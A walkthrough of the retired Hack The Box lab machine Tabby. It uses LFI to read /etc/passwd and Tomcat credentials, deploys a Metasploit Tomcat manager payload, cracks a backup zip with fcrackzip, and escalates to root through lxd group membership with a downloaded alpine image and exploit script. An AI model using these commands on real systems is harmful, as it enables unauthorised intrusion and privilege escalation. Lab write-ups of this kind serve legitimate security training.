CTF Challenges

Tabby HacktheBox Walkthrough

Today, we’re sharing another Hack the box Challenge Walkthrough box: Tabby and the machine is part of the retired lab, so you can connect to the machine using your HTB VPN and then start to solve the CTF.

The level of the Lab is set: Beginner to intermediate.

Task: Capture the user.txt and root.txt flags.

Penetration Testing Methodology

Network Scanning

  • Nmap


  • LFI


  • Tomcat Manager Deploy using Metasploit

Privilege Escalation

  • Lxd | Lxc


Network Scanning

As we know the victim’s machine IP thus, we can start with Nmap scanning to identify the open ports and services running across it.

nmap -sC -sV

We found ports 22,80 & 8080 are open for SSH, HTTP, and Tomcat respectively.


We explore the IP inside the web browser but unfortunately did not find any clue.

Then we have edited the /etc/hosts file by adding IP and domain name as highlighted in the image.

Then we try to browse the DNS name “megahosting.htb” and navigate to the News tab. Here I notice the URL contains a “file” parameter that indicates a possibility for LFI.

Let’s check it …………………….

Thus, I try to execute the following URL and obtained the records /etc/passwd file on the web browser as output.


The password file has a user account named ash.

As you know port 8080 was open for tomcat when I navigate to http://megagosting.htb:8080 I notice a path for user.xml at the end of the page.

Hmmm! As we know the machine is vulnerable to LFI, so we can try to access the user.xml through the web browser for tomcat login authentication.

Thus, I explored source code in the following URL:


As it is the user.xml configuration file that has tomcat authentication login credential.

Username: tomcat
Password: $3cureP4s5w0rd123!


Without wasting time, I load the Metasploit framework and run the following exploit by providing the following inputs.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhosts
msf exploit(tomcat_mgr_deploy) > set report 8080
msf exploit(tomcat_mgr_deploy) > set httpusername tomcat
msf exploit(tomcat_mgr_deploy) > set httppassword $3cureP4s5w0rd123!
msf exploit(tomcat_mgr_deploy) > set path /manager/text
msf exploit(tomcat_mgr_deploy) > set lhost
msf exploit(tomcat_mgr_deploy) > set target 1
msf exploit(tomcat_mgr_deploy) > run

Booom!! We have the meterpreter session of the machine, let’s enumerate further and try to get the 1st flag.

I navigate to /var/www/html and found a “files” folder.

Inside /file directory, it holds a zip file for backup that I transfer to my local machine.

This was a password-protected zip file and by using RockYou dictionary I try to crack the password with the help of fcrackzip tool.  Thus, I found the password “admin@it” and with the help of this, I extracted the zip file. 

fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
unzip 16162020_backup.zip

Lol!!! It holds nothing, here the author tried to make us fool.

Privilege Escalation

As we found a username account “Ash” in the /etc/passwd file thus I used the above-enumerated password for login as Ash and found the 1st flag in the user.txt, then I check for user id and noticed Ash is a member lxd group.

Note: In our article LXD privilege escalation we have discussed how to escalate the root privilege by exploiting lxd | lxc.

Read the article from here

But I am going to use another method for exploiting the given permissions. You can find the lxd privilege escalation exploit from here and follow the steps mention below.

Step 1: Download the alpine in your attacking machine

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Step 2: Run the following command to build the package

bash build-alpine

Step 3: Save the exploit in a file “raj. sh” and then transfer the package and bash script to the target machine.

chmod 777 raj.sh
./raj.sh -f alpine-v3.12-x86_64-20210104_1537.tar.gz

cd /mnt/root/root
cat root.txt

Boom! We got the final flag and complete task 😊

Author: Varsha Rohith is an ardent cybersecurity enthusiast and technical writer at Hacking Articles. LinkedIn